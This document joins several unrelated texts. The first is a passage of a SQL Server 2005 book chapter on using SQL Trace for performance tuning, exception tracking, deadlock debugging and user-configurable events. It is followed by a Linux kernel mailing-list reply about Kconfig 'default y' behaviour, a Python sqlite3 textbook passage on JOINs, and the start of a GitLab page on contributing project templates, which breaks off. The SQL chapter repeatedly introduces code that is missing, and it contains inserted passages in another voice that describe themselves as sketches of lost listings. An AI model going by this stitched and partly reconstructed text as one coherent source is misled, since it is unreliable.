- Transactions:SQLTransaction This event can be used to monitor transaction starts, commits, and rollbacks. You can determine which state the transaction is in by looking at the EventSubClass column, which will have a value of 0, 1, or 2 for a transaction starting, committing, or rolling back, respectively. Note that because every data modification uses a transaction, this event can cause a huge amount of data to be returned on a busy server.
If possible, make sure to filter your trace based on a specific spid that you're tracking.
- User Configurable (Event Category) This event category contains 10 events, named UserConfigurable:0 through UserConfigurable:9. These events can be fired by users or modules with sufficient ALTER TRACE access rights, allowing custom data to be traced. We discuss some possibilities in the “Stored Procedure Debugging” section of this chapter.

Performance Tuning

Performance is always a hot topic, and for a good reason; in today's competitive business landscape, if your users feel that your application is too slow, they'll simply move on to a different provider. In order to help you prevent this from happening, SQL Trace comes loaded with several event classes that you can harness in order to find and debug performance bottlenecks.

Note Performance monitoring is an art unto itself, and a complete methodology is outside the scope of this chapter; in this chapter, we'll stick with only what you can do using SQL Trace. Different aspects of troubleshooting for performance are discussed throughout this book. In addition, for a comprehensive discussion on the topic of how to think about SQL Server performance, please refer to Inside SQL Server 2005: T-SQL Querying (Microsoft Press, 2006).

Performance monitoring techniques can be roughly grouped into two categories: those you use when you already know something about the problem, and those you use to find out what the problem is (or find out if there even is a problem). These categories tend to dovetail nicely; once you've found out something about the problem, you can start heading in the direction of getting more information. Therefore, let's start with the second technique, helping to pinpoint problem areas, and then move into how to conduct a more detailed analysis.
When walking into a new database performance tuning project, the very first thing we want to find out is which queries make up the “low-hanging fruit.” In other words, we want to identify the worst performance offenders, as these are the ones that can give us the biggest tuning gains. It's important at this stage not to trace too much information, so we generally start with only the Stored Procedures:RPC:Completed and TSQL:SQL:BatchCompleted events. These events are both selected in the TSQL_Duration template that ships with SQL Server Profiler. We recommend adding the Reads, Writes, and CPU columns for both events, which are not selected by default in the template, in order to get a more complete picture. We also recommend selecting the TextData column rather than the (default) BinaryData column for the RPC:Completed event—this will make it easier to work with the data later. A properly specified set of events is shown in Figure 2-13.

Figure 2-13 Selected events/columns for an initial performance audit

Once you've selected the events, set a filter on the Duration column for a small number of milliseconds. Most of the active OLTP systems we've worked with have an extremely large number of zero-millisecond queries, and these are clearly not the worst offenders in terms of easy-to-fix performance bottlenecks. We generally start with the filter set to 100 milliseconds, and work our way up from there. The idea is to increase the signal-to-noise ratio on each iteration, eliminating “smaller” queries and keeping only those that have a high potential for performance tuning. We generally run each iterative trace for 10 to 15 minutes, depending on the application and server load, then take a look at the results and increase the filter value appropriately until we net only a few hundred events over the course of the trace. Note that the 10- to 15-minute figure may be too high for some extremely busy applications.
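If you prefer a server-side trace for this initial audit, the same event, column, and filter setup can be scripted with the sp_trace_* procedures. A sketch follows; the output path is a placeholder, and note that server-side Duration filters in SQL Server 2005 are specified in microseconds, not milliseconds:

```sql
DECLARE @TraceID int;
DECLARE @maxfilesize bigint;
DECLARE @on bit;
DECLARE @minduration bigint;
SET @maxfilesize = 100;
SET @on = 1;
SET @minduration = 100000;  -- 100 ms, expressed in microseconds

EXEC sp_trace_create @TraceID OUTPUT, 0, N'C:\Traces\perf_audit', @maxfilesize;

-- Event 10 = RPC:Completed, 12 = SQL:BatchCompleted
-- Columns: 1 = TextData, 12 = SPID, 13 = Duration, 16 = Reads, 17 = Writes, 18 = CPU
EXEC sp_trace_setevent @TraceID, 10, 1, @on;
EXEC sp_trace_setevent @TraceID, 10, 12, @on;
EXEC sp_trace_setevent @TraceID, 10, 13, @on;
EXEC sp_trace_setevent @TraceID, 10, 16, @on;
EXEC sp_trace_setevent @TraceID, 10, 17, @on;
EXEC sp_trace_setevent @TraceID, 10, 18, @on;
EXEC sp_trace_setevent @TraceID, 12, 1, @on;
EXEC sp_trace_setevent @TraceID, 12, 12, @on;
EXEC sp_trace_setevent @TraceID, 12, 13, @on;
EXEC sp_trace_setevent @TraceID, 12, 16, @on;
EXEC sp_trace_setevent @TraceID, 12, 17, @on;
EXEC sp_trace_setevent @TraceID, 12, 18, @on;

-- Keep only events with Duration >= @minduration (logical AND = 0, comparison GE = 4)
EXEC sp_trace_setfilter @TraceID, 13, 0, 4, @minduration;

EXEC sp_trace_setstatus @TraceID, 1;  -- start the trace
```

To iterate on the filter threshold as described above, stop and close the trace (sp_trace_setstatus with status 0, then 2) and re-create it with a larger @minduration.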
See the “Tracing Considerations and Design” section later in this chapter for more information. The other option is to run only the initial trace, and then filter the results down from there. A simple way to handle that is with SQL Server 2005's NTILE windowing function, which divides the input rows into an equal number of “buckets.” To see only the top 10 percent of queries in a trace table, based on duration, use the following query:

WITH DurationBuckets AS
(
    SELECT
        *,
        NTILE(10) OVER (ORDER BY Duration DESC) AS Bucket
    FROM TraceTable
)
SELECT *
FROM DurationBuckets
WHERE Bucket = 1;

Note The execution by an application of an extremely large number of seemingly small—even zero-millisecond—queries can also be a performance problem, but it generally has to be solved architecturally, by removing chatty interfaces, rather than via Transact-SQL query tuning. Profiling to find these kinds of issues can also be incredibly difficult without knowledge of exactly what a particular application is doing, so we will not cover it here.

If you find that it is difficult to get the number of events returned to a manageable level—a common problem with very busy systems—you may have to do some tweaking of the results to group the output a bit better. The results you get back from SQL Trace will include raw text data for each query, including whichever actual arguments were used. To analyze the results further, the data should be loaded into a table in a database, then aggregated, for example, to find average duration or number of logical reads. The problem is doing this aggregation successfully on the raw text data returned by the SQL Trace results.
The actual arguments are good to know—they're useful for reproducing performance issues—but when trying to figure out which queries should be tackled first, we find that it's better to aggregate the results by query “form.” For example, the following two queries are of the same form—they use the same table and columns, and only differ in the argument used for the WHERE clause—but because their text is different it would be impossible to group them as-is:

SELECT * FROM SomeTable WHERE SomeColumn = 1
---
SELECT * FROM SomeTable WHERE SomeColumn = 2

To help solve this problem, and reduce these queries to a common form that can be grouped, Itzik Ben-Gan provided a CLR UDF in Inside SQL Server 2005: T-SQL Querying, a slightly modified version of which—that also handles NULLs—follows:

using System.Data.SqlTypes;
using System.Text.RegularExpressions;

[Microsoft.SqlServer.Server.SqlFunction(IsDeterministic = true)]
public static SqlString sqlsig(SqlString querystring)
{
    return (SqlString)Regex.Replace(
        querystring.Value,
        @"([\s,(=<>!](?![^\]]+[\]]))(?:(?:(?:(?:(?# expression coming
         )(?:([N])?(')(?:[^']|'')*('))(?# character
         )|(?:0x[\da-fA-F]*)(?# binary
         )|(?:[-+]?(?:(?:[\d]*\.[\d]*|[\d]+)(?# precise number
         )(?:[eE]?[\d]*)))(?# imprecise number
         )|(?:[~]?[-+]?(?:[\d]+))(?# integer
         )|(?:[nN][uU][lL][lL])(?# null
         ))(?:[\s]?[\+\-\*\/\%\&\|\^][\s]?)?)+(?# operator
         )))",
        @"$1$2$3#$4");
}

This UDF finds most values that “look” like arguments, replacing them with a “#”. After processing both of the preceding queries with the UDF, the output would be the same:

SELECT * FROM SomeTable WHERE SomeColumn = #

To use this UDF to help with processing a trace table to find the top queries, you might start with something along the lines of the following query, which groups each common query form and finds average values for Duration, Reads, Writes, and CPU:

SELECT
    dbo.sqlsig(CONVERT(nvarchar(4000), TextData)) AS QueryForm,
    COUNT(*) AS Executions,
    AVG(Duration) AS AvgDuration,
    AVG(Reads) AS AvgReads,
    AVG(Writes) AS AvgWrites,
    AVG(CPU) AS AvgCPU
FROM TraceTable
GROUP BY dbo.sqlsig(CONVERT(nvarchar(4000), TextData))
ORDER BY AvgDuration DESC;

From here you can further filter by the average values in order to find those queries to which you'd like to dedicate a bit more attention.
Once you have decided upon one or more queries to tune, you can use SQL Trace to help with further analysis. For example, suppose that you had isolated the following stored procedure, which can be created in the AdventureWorks database, as a culprit: To begin a session to analyze what this stored procedure is doing, first open a new query window in SQL Server Management Studio, and get the spid of your session using the @@SPID function. Next, open SQL Server Profiler, connect to your server, and select the Tuning template. This template adds SP:StmtCompleted to the combination of events used to get a more general picture of server activity. This will result in a lot more data returned per call, so use the spid you collected before to filter your trace. You also might wish to add the Showplan XML Statistics Profile event, in order to pull back query plans along with the rest of the information about your query. Figure 2-14 shows a completed Events Selection screen for this kind of work. Note Adding a Showplan XML or Deadlock Graph event causes an additional tab to open in the Trace Properties dialog, called Events Extraction Settings. This tab contains options for automatically saving any collected query plans or deadlock graph XML to text files, in case you need to reuse them later. Next, go ahead and start the trace in SQL Server Profiler. Although we generally use server-side traces for most performance monitoring, the amount of overhead that Profiler brings to the table when working with a single spid to process a single query is small enough that we don’t mind harnessing the power of the UI for this kind of work. Figure 2-15 shows the Profiler output on our end after starting the trace and running the query for @EmployeeID=21. 
We have selected one of the Showplan XML events in order to highlight the power of this feature; along with each statement executed by the outermost stored procedure and any stored procedures it calls, you can see a full graphical query plan, all in the Profiler UI. This makes it an ideal assistant for helping you tune complex, multilayered stored procedures. SQL Trace will not actually tune for you, but it will help you to find out not only which queries are likely to be causing problems, but also which components of those queries need work. However, performance tuning is far from the only thing that it can be used for. In the next section, we'll explore another problem area—exceptions—and how to use SQL Trace to help in tracking them down.

Figure 2-14 Trace set up for performance profiling of a single spid's workload

Figure 2-15 Using Profiler to trace batches, statements, and query plans

Note Saying that SQL Trace will not actually tune for you is only mostly correct. SQL Server's Database Engine Tuning Advisor (DTA) tool can take trace files as an input, in order to help recommend indexes, statistics, and partitions to make your queries run more quickly. If you do use the DTA tool, make sure to feed it with a large enough sample of the queries your system generally handles. Too small a collection size will skew the results, potentially causing the DTA to make subpar recommendations, or even produce suggestions that cause performance problems for other queries that weren't in the input set.

Identifying Exceptions

In a perfect world, all exceptions would be caught, handled, and logged. Appropriate personnel would regularly watch the logs and create bug reports based on the exceptions that occurred, such that they could be debugged in a timely manner and avoided in the future.
But alas, the world is far from perfect, and it is quite common to see applications that regularly bubble exceptions all the way from the database to the user interface, with no logging of any kind. Or, worse, applications that catch and swallow exceptions, resulting in no one ever knowing that they occurred, yet occasionally resulting in strange data returned to users who aren’t quite sure what’s going on. In order to find out when either of these scenarios is happening, we often take a proactive approach and watch for exceptions so that we can find and fix them—hopefully before they frustrate too many users. Tracing for exceptions is fairly simple; you can start with the TSQL template, which includes the Audit Login and Audit Logout events, as well as the ExistingConnection event—all of which can be removed for this exercise. Left are RPC:Starting and SQL:BatchStarting, both of which are needed in order to trace the Transact-SQL that caused an exception, whether it occurred as the result of an SQL batch or RPC call. It’s important to trace for the Starting rather than Completed events in this case, because certain errors can result in the Completed event not firing for a given query. To the RPC and SQL events, add the Attention, Exception, and User Error Message events from the Errors and Warnings category. The Attention event fires whenever a client forcibly disconnects–the best example of which is a client-side query time-out. These are good to know about, and usually indicate performance or blocking issues. The Exception event fires whenever an exception of any kind occurs, whereas the User Error Message event fires either in conjunction with an exception—to send back additional data about what occurred, in the form of a message—or whenever a variety of statuses change, such as a user switching from one database to another. We also recommend adding the EventSequence column for each selected event class. This will make querying the data later much easier. 
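Before leaving such a trace running, it can be worth sanity-checking it by generating a harmless error yourself; a throwaway statement like the following produces both an Exception event and a matching User Error Message event on your spid:

```sql
-- Error 50000, severity 16: shows up in the trace as an Exception event
-- immediately followed by a User Error Message event carrying this text.
RAISERROR('Trace test: this error is intentional.', 16, 1);
```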
Figure 2-16 shows a completed Events Selection dialog box for the events and columns that we recommend for exception monitoring.

Note SQL Server uses exceptions internally to send itself messages during various phases of the query execution process. A telltale sign of this is an Exception event with no corresponding User Error Message event. Should you see such a situation, do not be alarmed; it's not actually an error meant for you to consume.

Once you've selected the appropriate events, script the trace and start it. This is the kind of trace you may want to run in the background for a while, doing occasional collections. See the "Tracing Considerations and Design" section for more information. Generally, you may find it interesting to collect this data during fairly busy periods of activity, in order to find out what exceptions your users may be experiencing. Since this kind of tracing is more like casting a net and hoping to catch something than a hunt for something specific, timing is of the essence. You may or may not see an exception, but just because you don't see one during one collection period doesn't mean they aren't happening; make sure to monitor often.

Figure 2-16 Events Selection used for tracing to discover exceptions and disconnections

Once you've captured your data and transferred it into a table, reporting on which exceptions occurred is a matter of finding:

- All Attention events (EventClass 16) and the Transact-SQL or RPC event (EventClass 13 and 10, respectively) on the same spid that preceded the disconnection.
- All Exception events (EventClass 33) immediately followed by a User Error Message event (EventClass 162), and the Transact-SQL or RPC event on the same spid that preceded the exception.

All logic for following and preceding can be coded using the EventSequence column, which is why we recommend including it in this trace.
The following query uses this logic to find all user exceptions and disconnections, related error messages where appropriate, and the queries that caused the problems:

;WITH Exceptions AS
(
    SELECT
        T0.SPID,
        T0.EventSequence,
        COALESCE(T0.TextData, 'Attention') AS Exception,
        T1.TextData AS MessageText
    FROM TraceTable T0
    LEFT OUTER JOIN TraceTable T1 ON
        T1.EventSequence = T0.EventSequence + 1
        AND T1.EventClass = 162
    WHERE
        T0.EventClass IN (16, 33)
        AND (T0.EventClass = 16 OR T1.EventSequence IS NOT NULL)
)
SELECT *
FROM Exceptions
CROSS APPLY
(
    SELECT TOP(1)
        TextData AS QueryText
    FROM TraceTable Queries
    WHERE
        Queries.SPID = Exceptions.SPID
        AND Queries.EventSequence < Exceptions.EventSequence
        AND Queries.EventClass IN (10, 13)
    ORDER BY EventSequence DESC
) p

If you've collected a large number of events, you can greatly improve the performance of this query by creating a clustered index on the trace table, on the EventSequence column.

Tip If you're aware of an exception condition that occurs when a certain stored procedure is called, but you need more information on what sequence of events causes it to fire, you might work with the same events detailed in the preceding section, for performance tuning of a single query. Switch the query events shown in that section from Completed to the corresponding Starting classes, and add the Exception and User Error Message events. Much like with the tuning of a single query example, this is something you should run directly in SQL Server Profiler, with a filter on the spid from which you're working.

Debugging Deadlocks

Tracking general exceptions is a good thing, but every DBA knows the horrors of dealing with a certain type of exception: message number 1205, severity 13, familiarly known as deadlocks. Deadlock conditions are difficult to deal with because it often feels like you just don't get enough data from the server to help you figure out exactly what happened and why.
Even the error message returned by the server is somewhat hopeless; the only suggestion made in the message is that you might "rerun the transaction." SQL Trace has long exposed tools to help with isolating and debugging deadlock conditions, but SQL Server 2005 takes these to the next level, providing a very useful graphical interface to help you resolve these nasty issues.

To illustrate what is available, we'll show you how to force a deadlock in the tempdb database. Start with the following code:

By starting two separate transactions and staggering updates to the rows in the opposite order, we can make a deadlock occur and observe how SQL Trace can help with debugging.

Note The following example assumes that you have already identified the two stored procedures or queries involved in causing the deadlock, either based on an exception trace as shown in the preceding section, or by enabling trace flag 1222 at the server level (add –T1222 to the startup parameters for the SQL Server service) and collecting the deadlocking resources from the SQL Server error log. Once you have identified the participating queries, conduct the actual research on a development instance of SQL Server on which you've restored the production data. Debugging deadlocks can require collecting a lot of data, and because some of the events are fired by system spids it can be impossible to filter the trace so that you only collect relevant data. On a busy system this trace will create a very large amount of load, so we recommend always working offline.

To begin with, open two query windows in SQL Server Management Studio, and collect their spids using @@SPID. You may want to use these spids later to help with analysis of the collected trace data. Start a new SQL Server Profiler session and use the TSQL template to select the RPC:Starting and SQL:BatchStarting events. To these, add the Deadlock graph, Lock:Acquired, Lock:Escalation, and Lock:Released events, all from the Locks category.
The Lock events will help you analyze the sequence of locks taken to contribute to the deadlock condition, and the Deadlock graph event will help with a graphical display of what went wrong. You might optionally consider adding the SP:StmtStarting event, in case one or more of the stored procedures you're debugging are running numerous statements, any of which might be contributing to the deadlock. You should also add the EventSequence column, in order to make it easier to analyze the data after collection. Figure 2-17 shows the completed Events Selection dialog box for this activity.

Tip In this example, we will show you how to run the statements in exactly the correct order and at the correct times to force a deadlock to occur while you watch the trace in SQL Server Profiler. However, in many real-world situations it's not quite that easy; many deadlocks depend upon exact timing (or mistiming) and to reproduce them you'll have to run each query in a loop, hoping that they eventually collide in just the right way. SQL Server Management Studio also has a feature to help you run a query in a loop as many times as you'd like. In each query window, set up the batch for your queries, then follow the batch with GO and the number of times you'd like the query to run. For example, the following Transact-SQL code will execute the MyStoredProcedure stored procedure 1,000 times:

EXEC MyStoredProcedure
GO 1000

Figure 2-17 Completed Events Selection dialog box for debugging deadlocking queries

Once your events are set up, start the trace in Profiler. Note that no filters should be used in this case, as the Deadlock graph event may be fired by any number of system spids. As a result of the lack of filters, you'll see some system lock activity. This can be ignored or filtered out after the trace has been completed. Another strategy is covered later in this chapter, in the "Reducing Trace Overhead" section.
Once the trace is started, return to the first query window (spid 52 in our test), and run the following batch:

Next, run the following batch in the second query window (spid 53 in our test):

Both of these queries should return, since their locks are compatible; they're each taking locks on different rows of the Deadlock_Table table.

Back in the first query window, start the following update, which will begin waiting on the second window's session to release its lock:

Finally, return to the second window and run the following update, which will start waiting on the first window's session to release its lock. Since both sessions will now be waiting for each other to release resources, a deadlock will occur:

After the deadlock has occurred the trace can be stopped. Find the Deadlock graph event produced, which should look something like the one shown in Figure 2-18.

The Deadlock graph event includes a huge amount of data to help you debug what occurred. Included are the object ID, the index name (if appropriate), and the HoBt (Hash or B-Tree) ID, which can be used to filter the locking resource even further, by using the hobt_id column of the sys.partitions view. In addition, you can determine the actual queries that were involved in the deadlock by scrolling back and finding the last query event run by each spid prior to the deadlock occurring.

Figure 2-18 Viewing the Deadlock graph event in SQL Server Profiler

Should you need more data to debug further, you also have a wealth of lock information available. You might notice that in the screenshot, none of the lock events adjacent to the Deadlock graph event have anything to do with the spids with which we were working. The system acquires and releases quite a few locks even while at rest, so to look at the lock chain in more detail you'll want to load the data into a trace table and make use of the EventSequence column to rebuild exactly what happened, in the correct order.
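The batches referenced in this walkthrough were not preserved in this excerpt. As a minimal sketch of what they might look like, the following would produce the deadlock pattern described above; the table definition, column names, and values are assumptions (the text only names the Deadlock_Table table and the tempdb database):

```sql
USE tempdb
GO

-- Assumed setup: a two-row table for the two sessions to contend over
CREATE TABLE Deadlock_Table (id INT PRIMARY KEY, value INT)
INSERT INTO Deadlock_Table (id, value) VALUES (1, 100)
INSERT INTO Deadlock_Table (id, value) VALUES (2, 200)
GO

-- Window 1 (e.g., spid 52): take and hold a lock on row 1
BEGIN TRANSACTION
UPDATE Deadlock_Table SET value = value + 1 WHERE id = 1

-- Window 2 (e.g., spid 53): take and hold a lock on row 2
BEGIN TRANSACTION
UPDATE Deadlock_Table SET value = value + 1 WHERE id = 2

-- Window 1: blocks, waiting on window 2's lock
UPDATE Deadlock_Table SET value = value + 1 WHERE id = 2

-- Window 2: now waits on window 1; the deadlock monitor terminates one session
UPDATE Deadlock_Table SET value = value + 1 WHERE id = 1
```

Each commented step is run in the indicated query window, in order, so that the two transactions update the rows in opposite order and collide.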
As with performance analysis, SQL Trace will not actually resolve the deadlock condition for you, but it will provide you with ample data to help you determine its cause and get closer to a resolution. In the next section, we'll explore other debugging tricks with SQL Trace.

Stored Procedure Debugging

SQL Server 2005 includes many different tools to help you debug complex stored procedures. These include a Transact-SQL debugger available in Visual Studio, the ability to embed print statements or otherwise return debug statuses from your stored procedures, and the ability to raise custom errors from within your stored procedures in order to log status information. SQL Trace also supplies an underpublicized tool that can be helpful in this regard, called user-configurable events.

A user-configurable event is nothing more than a call to a system stored procedure called sp_trace_generateevent. This stored procedure accepts three parameters:

- @eventid is an integer value between 82 and 91. Each value corresponds to one of the 10 user-configurable event classes, numbered from 0 through 9; a value of 82 will raise a UserConfigurable:0 event, 83 will raise a UserConfigurable:1 event, etc.
- @userinfo is an nvarchar(128) value that will be used to populate the TextData column for the event.
- @userdata is a varbinary(8000) value that will be used to populate the BinaryData column for the event.

In a few especially tricky situations, we've had to deal with stored procedures that only occasionally failed, under circumstances that were difficult to replicate in a test environment. Long-term tracing in these situations can be difficult, as to really debug the situation might require statement-level collection, which will produce a lot of data if run for extended periods. A better option is to trace at the stored-procedure- and batch-level only, and use user-configurable events to collect variable values and other data to help you debug the problem when it does actually occur.
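Putting the three parameters described above together, a call that raises a UserConfigurable:0 event might look like the following sketch (the message text is purely illustrative):

```sql
-- Raises UserConfigurable:0 (event ID 82); @userinfo populates the event's
-- TextData column and @userdata populates its BinaryData column.
-- Requires ALTER TRACE permission.
EXEC sp_trace_generateevent
    @eventid = 82,
    @userinfo = N'Debug checkpoint reached',
    @userdata = NULL
```

Any trace that includes the UserConfigurable:0 event class will pick this event up alongside the usual batch and RPC events.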
This way you can leave the system running and functional, without having to worry about your trace collecting too much data.

To set this up, you must first be aware that the sp_trace_generateevent stored procedure requires ALTER TRACE permission in order to be run. Since it's unlikely that your stored procedures will have access to that permission, it is a good idea to create a wrapper stored procedure that calls sp_trace_generateevent, and which has the appropriate permission. To make this happen, we'll have to employ SQL Server 2005's module signing feature.

The first step is to create a certificate in the master database:

Next, a login is created based on the certificate. The login is granted both ALTER TRACE and AUTHENTICATE SERVER permissions, the latter of which gives it the right to propagate server-level permissions to database-level modules (such as the wrapper stored procedure):

Once that's taken care of, back up the certificate, including the private key. The backup will be used to restore the same certificate in any user database in which you'd like to use the wrapper stored procedure. For the sake of this chapter's sample code, we'll show you how to build the wrapper procedure in tempdb, but in reality you could do this in any user database.
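The certificate and login listings were dropped from this excerpt. A sketch of what they might contain, reconstructed from the names and file paths used in the tempdb code that follows (the subject text is an assumption), is:

```sql
USE master
GO

-- Create the certificate that will carry the permissions
CREATE CERTIFICATE ALTER_TRACE_CERT
ENCRYPTION BY PASSWORD = '-UsE_a!sTr0Ng_PwD-or-3~'
WITH SUBJECT = 'ALTER TRACE permission for user-configurable events'
GO

-- Create a login from the certificate and grant it the required permissions
CREATE LOGIN ALTER_TRACE_LOGIN FROM CERTIFICATE ALTER_TRACE_CERT
GO
GRANT ALTER TRACE TO ALTER_TRACE_LOGIN
GRANT AUTHENTICATE SERVER TO ALTER_TRACE_LOGIN
GO

-- Back up the certificate and private key for restore into user databases
BACKUP CERTIFICATE ALTER_TRACE_CERT TO FILE = 'C:\ALTER_TRACE.cer'
WITH PRIVATE KEY
(
    FILE = 'C:\ALTER_TRACE.pvk',
    ENCRYPTION BY PASSWORD = '-UsE_a!sTr0Ng_PwD-or-3~',
    DECRYPTION BY PASSWORD = '-UsE_a!sTr0Ng_PwD-or-3~'
)
GO
```

This is a sketch, not the book's exact listing; any production use should of course choose its own password and file locations.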
The following code creates a certificate in tempdb from the backed-up version, then creates a simple wrapper over the sp_trace_generateevent stored procedure:

USE tempdb
GO

CREATE CERTIFICATE ALTER_TRACE_CERT
FROM FILE = 'C:\ALTER_TRACE.cer'
WITH PRIVATE KEY
(
    FILE = 'C:\ALTER_TRACE.pvk',
    ENCRYPTION BY PASSWORD = '-UsE_a!sTr0Ng_PwD-or-3~',
    DECRYPTION BY PASSWORD = '-UsE_a!sTr0Ng_PwD-or-3~'
)
GO

CREATE PROCEDURE ThrowEvent
    @eventid INT,
    @userinfo nvarchar(128),
    @userdata varbinary(8000)
AS
BEGIN
    EXEC sp_trace_generateevent
        @eventid = @eventid,
        @userinfo = @userinfo,
        @userdata = @userdata
END
GO

To complete the exercise, the stored procedure is signed with the certificate (which gives the procedure effectively all of the same permissions as the ALTER_TRACE_LOGIN login), and then permission is granted for any user to run the stored procedure:

Once the ThrowEvent stored procedure is created in the database(s) of your choice, you can begin using it from within other stored procedures, and, thanks to the certificate, you can do so without regard to what permissions the caller has. This can be an invaluable tool when trying to figure out the context around intermittent problems.

For example, suppose that you find during testing that one of your stored procedures that should be updating a few rows in a certain table seems to not update anything from time to time. This problem seems to be caused by the state of yet another table at exactly the time the stored procedure is called, but you haven't yet been able to reproduce things lining up in just that way. To help debug this, you might insert the following code into your stored procedure, just after the update:

At this point, you would set up a trace to capture RPC:Starting and SQL:BatchStarting events, as well as the UserDefined:0 event.
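The two remaining listings (signing the wrapper procedure, and the debug call inserted just after the update) are missing from this excerpt. A hypothetical sketch, using the names established above, might be:

```sql
-- Sign the wrapper procedure with the certificate, then let anyone call it
ADD SIGNATURE TO ThrowEvent BY CERTIFICATE ALTER_TRACE_CERT
    WITH PASSWORD = '-UsE_a!sTr0Ng_PwD-or-3~'
GO
GRANT EXECUTE ON ThrowEvent TO public
GO

-- Hypothetical debug call, placed immediately after the UPDATE being
-- investigated: fire UserConfigurable:0 whenever the update touches no rows
IF @@ROWCOUNT = 0
BEGIN
    EXEC ThrowEvent
        @eventid = 82,
        @userinfo = N'Update affected no rows',
        @userdata = NULL
END
```

Note that @@ROWCOUNT must be read on the very next statement after the UPDATE, which is why the check sits directly after it.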
After letting the trace run for a while, once the user-defined event fires letting you know that no rows were inserted, you may have collected enough back data to figure out what state the other table was in at the exact time of the insert.

This is somewhat of a contrived example, but it helps show the power of adding this tool to your stored procedure debugging toolkit. The more controllable visibility you have into what's going on in your stored procedures, the easier it becomes to track down and fix small problems before they turn into major ones. In the next section, we'll get into how to keep SQL Trace itself from causing you problems.
http://technet.microsoft.com/en-us/library/cc293616.aspx
Re: BUG in 2.6.22-rc2-mm1: Parts of Alsa sound architecture broken

- From: Takashi Iwai <tiwai@xxxxxxx>
- Date: Fri, 08 Jun 2007 11:29:16 +0200

At Wed, 6 Jun 2007 21:53:08 +0200, Sam Ravnborg wrote:
On Wed, Jun 06, 2007 at 09:36:48PM +0200, Jens Axboe wrote:
On Tue, Jun 05 2007, Takashi Iwai wrote:

It is the functionality of "default y" that is not understood.

At Tue, 5 Jun 2007 15:25:07 +0200 (MEST), Jan Engelhardt wrote:

Well, I find the change of CONFIG_SND to menuconfig is fine, too. But CONFIG_SND_PCI_DRIVERS and others don't make much sense to me. How is it useful at all?

Hah, I just tell you some of my own experience. In summer 2003, I bought the last new machine, and it got these shiny new ports they like to call USB. :) I did not have much use for it, but I left it on - you never know what standard next is the big win of the decade. And actually, it did not took long (well, summer 2005) to get my first USB device. Still, I am hell as sure I do not have USB-based sound devices anytime soon, so it would be cool to deactivate the whole usbsound menu at once.

I think I said that in the patch description, did not I? But it's not cool to add an extra config item just for that, too. And, the structure of menuconfig-if-endif is uglier than menu-endmenu. That's why I feel a bit uneasy, although all these are a matter of taste...

Forgot to mention about another annoying drawback. Because of the new CONFIG_SND_*_DRIVERS, you'll have to re-select all belonging CONFIG_SND_*, even via config oldconfig. Putting the dependency on the top seems to reset the values defined in the old .config.

Well, *I* (previously) submitted patches with "default y", but Jens Axboe [] disagreed heavily enough to stop that practice.

Hm, I guess Jens didn't know about this side-effect. When I don't set "default y", I'll be asked for each belonging item even though I chose "y" manually for the top config (CONFIG_*_DRIVERS). Strangely, setting "default y" has no this effect...
That sounds like a bug in the kconfig system. I still think default y is an *awful* idea, but you can read why in the thread referenced above.

Take the following simple Kconfig file:

config FOO
	bool "FOO"
	default y

config BAR
	bool "BAR"

What would you expect when you execute "make oldconfig"? You would expect to be questioned about both symbols and pressing enter would give you the following config:

CONFIG_FOO=y
# CONFIG_BAR is not set

So "default y" in the oldconfig case where we add a symbol gives the default value if you just press enter. If you use "make menuconfig" and just enter menuconfig and exit and save you will end up with the exact same configuration as above because menuconfig will select default values for all new symbols.

In other words "default y" has no impact on what oldconfig asks about, only what value will be assigned if the user decides not to change the value. And this is exactly what it is supposed to do and no magic "do not ask user" thing. That can be solved by having correct dependencies so if the dependencies are not solved one will not be asked.

Well, then "default y" seems sensible for the new additions like this case (adding a menuconfig top-dependency that was formerly a simple menu).

Anyway, I think it's another problem of kconfig that it resets the old values when a new top-config is introduced without "default y". Assume the following kconfig:

menu "Foo"
	depends on DOH

config BAR
	bool "Bar"
	depends on DOH

endmenu

and an old .config file:

CONFIG_DOH=y
CONFIG_BAR=y

Now, replace menu with menuconfig:

menuconfig FOO
	bool "Foo"
	depends on DOH

if FOO

config BAR
	bool "Bar"

endif

Run make oldconfig, and you'll be asked about FOO (as expected). Answer y, then you'll be asked again about BAR, too. But, if "default y" is added to FOO,

menuconfig FOO
	bool "Foo"
	default y
	depends on DOH

then it asks about FOO, but it won't ask you about BAR.
Takashi
http://linux.derkeiler.com/Mailing-Lists/Kernel/2007-06/msg03250.html
Now that we have followed the rules of database normalization and have data separated into two tables, linked together using primary and foreign keys, we need to be able to build a SELECT that re-assembles the data across the tables. SQL uses the JOIN clause to re-connect these tables. In the JOIN clause you specify the fields that are used to re-connect.

The result of the JOIN is to create extra-long "meta-rows" which have both the fields from People and the matching fields from Follows. Where there is more than one match between the id field from People and the from_id field from Follows, then JOIN creates a meta-row for each of the matching pairs of rows, duplicating data as needed.

The following code demonstrates the data that we will have in the database after the multi-table Twitter spider program (above) has been run several times.

import sqlite3

conn = sqlite3.connect('spider.sqlite3')
cur = conn.cursor()

cur.execute('SELECT * FROM People')
count = 0
print 'People:'
for row in cur :
    if count < 5: print row
    count = count + 1
print count, 'rows.'

cur.execute('SELECT * FROM Follows')
count = 0
print 'Follows:'
for row in cur :
    if count < 5: print row
    count = count + 1
print count, 'rows.'

cur.execute('''SELECT * FROM Follows JOIN People
    ON Follows.from_id = People.id WHERE People.id = 2''')
count = 0
print 'Connections for id=2:'
for row in cur :
    if count < 5: print row
    count = count + 1
print count, 'rows.'

cur.close()

In this program, we first dump out the People and Follows tables and then dump out a subset of the joined data. In the "meta-rows" of the last select, the first two columns are from the Follows table, followed by columns three through five from the People table. You can also see that the second column (Follows.to_id) matches the third column (People.id) in each of the joined-up "meta-rows".
http://www.opentextbooks.org.hk/zh-hant/ditatopic/6819
- Prerequisites
- Create a new project
- Add the SVG icon to GitLab SVGs
- Vendoring process
- Test with GDK
- Contribute an improvement to an existing template

Contribute to GitLab project templates

Thanks for considering a contribution to the GitLab built-in project templates.

Prerequisites

To add a new or update an existing template, you must have the following tools installed:

- wget
- tar
- jq

Create a new project

To contribute a new built-in project template to be distributed with GitLab:

- Create a new public project with the project content you'd like to contribute in a namespace of your choosing. You can view a working example. Projects should be as simple as possible and free of any unnecessary assets or dependencies.
- When the project is ready for review, create a new issue with a link to your project. In your issue,

Add the SVG icon to GitLab SVGs

If the template you're adding has an SVG icon, you need to first add it to

- Follow the steps outlined in the GitLab SVGs project and submit a merge request.
- When the merge request is merged, gitlab-bot will pull the new changes in the gitlab-org/gitlab project.
- You can now continue on the vendoring process.

Vendoring process

To make the project template available when creating a new project, the vendoring process will have to be completed:

- Export the project you created in the previous step and save the file as <name>.tar.gz, where <name> is the short name of the project.
